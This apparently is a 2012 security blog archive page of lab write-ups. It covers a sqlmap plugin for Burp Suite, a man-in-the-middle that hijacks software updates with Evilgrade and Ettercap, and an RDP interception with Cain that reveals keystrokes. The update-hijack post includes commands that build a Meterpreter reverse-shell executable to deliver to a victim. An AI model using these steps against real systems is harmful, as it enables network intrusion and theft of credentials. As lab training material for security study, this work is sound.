Showing posts from September, 2012

MySQLDumper Exploit

------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- Security Research All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Sqlmap plugin for BurpSuite

Download SQLmap plugin for Brupsuite at: 1 - Store it in the same folder brupsuite 2 - Use this command to start brupsuite with plugin: ( on Linux) java -classpath gason-0.9.5.:"burpsuite_v1.4.01.jar" burp.StartBurp 3 - On start, when you click proxy tab/ action, you will see send to sqlmap Config web browser use brupsuite proxy. Now, you can use it 1 - Request from browser to brupsuite 2 - Action/ Send to SQLmap On SQLmap option, you must: 1 - Config SQLmap bin path 2 - Action 3 - Option if you need, then run And this is result: ------------------------------------------------------------ Thanks for reading -------------------------------------------------------------------------- Security Research All my Lab: Linux Lab -- window and Cisco Lab to be continued - I will update more.

Software Update MITM Exploit use Evilgrage and Ettercap

Many software check for updates, sometime updates are preformed over SSL. Commonly, updates are delivered over HTTP, which can be manipulated Modular exploit tool to spoof Software Update Responses, to delivers executable of your choosing to the victim. In this lab, i used Evilgrade with Ettercap Your victim machine use Notepad++ unstable: 1 - Unstable version 2 - Victim IP and DNS Install Evilgrade on Backtrack system: 1 - # cd /root 2 - # apt-get install libdata-dump-perl 3 - # wget 4 - # tar xfz isr-evilgrade-2.0.0.tar.gz 5 - # cd isr-evilgrade Prepare Metepreter executable to deliver to victim 1 - # ifconfig eth0 Get your Backtrack IP address 2 - # cd /root/isr-evilgrade/agent/ Go to evilgrade agent directory 3 - # /opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8080 X > agent.exe Create metepreter executable 4 - # ls Verify agent.exe 1 -

RDP Man in The Middle

Remote Desktop Protocol ( RDP) is used in most Windows environments. It often vulnerable to man-in-the-middle. You can decrypt session to reveal keystrokes. Today, we will demo this. Note: Newer RDP version can employ a certificate and TLS encryption, but self-signed certs are often used. And Cain is only tool we know of that can attack RDP ( even with TLS) We need three systems for yourself: •    RDP server •    RDP client ( victim) •    Attacker ( running Cain on Windows XP) Note: •    No security suite ( disable firewall) •    Note IP address of each •    Install Cain & Abel, and accept all default except WinPcap 1.    On RDP Server system, create an admin user account: 1 - Create an administrator account 2 – Then add it into Administrators groups 3 – Verify its creation 2.    Enable RDP on RDP server system: 1 - Right click My Computer 2 - Chose Properties 3 – Chose Remote tab 4 – Check “ Allow user to connect remotely to this compute”. Click ok on Confirm